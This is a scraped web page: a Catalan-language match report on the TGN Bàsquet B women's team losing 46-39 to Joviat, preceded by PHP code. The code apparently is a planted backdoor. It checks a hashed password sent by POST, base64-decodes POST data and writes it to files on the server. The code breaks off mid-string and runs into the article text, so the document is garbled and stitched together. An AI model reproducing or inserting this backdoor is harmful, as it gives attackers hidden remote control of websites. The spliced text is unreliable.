function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN Bàsquet B deixa escapar una gran oportunitat a la pista del Joviat (46-39) - Tgn Bàsquet Club -

El TGN Bàsquet B deixa escapar una gran oportunitat a la pista del Joviat (46-39)

Updated: octubre 12, 2015

El TGN Bàsquet B va deixar passar una gran oportunitat per sumar el primer triomf de la temporada. El conjunt lila, que amb aquesta derrota a la pista del Joviat ha perdut els tres partits que ha disputat, va tenir el seu rival contra les cordes després de fer un inici de matx excel·lent però es va bloquejar mentalment a mesura que passaven els minuts. El Joviat va jugar amb els nervis de les visitants que van tenir, en certa manera, por a guanyar i van perdre la decisió i la convicció en el seu joc que havien mostrat en gran part de la primera meitat. El Joviat, plantejant una defensa especulativa, que deixava la iniciativa a les exteriors del TGN Bàsquet B, en va tenir prou per capgirar el resultat que li era molt desfavorable a l’inici i va sumar un triomf vital (primera victòria en dos partits, en té un de pendent).

A diferència del que havia passat fins ara, el TGN Bàsquet B va sortir a la pista molt concentrat. El conjunt lila va ser un huracà i tot eren bones expectatives en vista el final del matx (4-15 al final del primer quart). La defensa de les tarragonines era de llibre i això provava ràpids contraatacs que permetien anotar, evitant el joc en estàtic, on no hi havia tant encert (9-21, minut 15). A partir d’aleshores, però, les coses es van començar a complicar. El Joviat va poder esgarrapar un parell de rebots ofensius que van escurçar les diferències abans del descans (19-25) i en el tercer quart, va arribar el daltabaix lila. Les locals van plantejar una defensa individual molt tancada a la zona, minimitzant la superioritat interior del TGN Bàsquet B. Aquesta defensa que flotava clarament el tir exterior li va sortir bé. El TGN Bàsquet B es va aturar en atac i van començar els dubtes. Massa passades, falta d’idees i tirs que no s’assumien. Les locals van capgirar el resultat (31-27, 27) i ja no deixarien la batuta del partit (14-5 de parcial en el tercer període).

En l’últim quart les diferències van ser minses pel Joviat, però el TGN Bàsquet B no controlava el rebot i les locals, animades per anar per davant en el resultat, van clavar tres triples en la segona meitat que van ser molt importants. En canvi, la punteria visitant no afinava i s’arribava al tram final amb desavantatge. Amb 42-39 el TGN Bàsquet va fallar un triple i la falta posterior per aturar el cronòmetre va sentenciar el matx.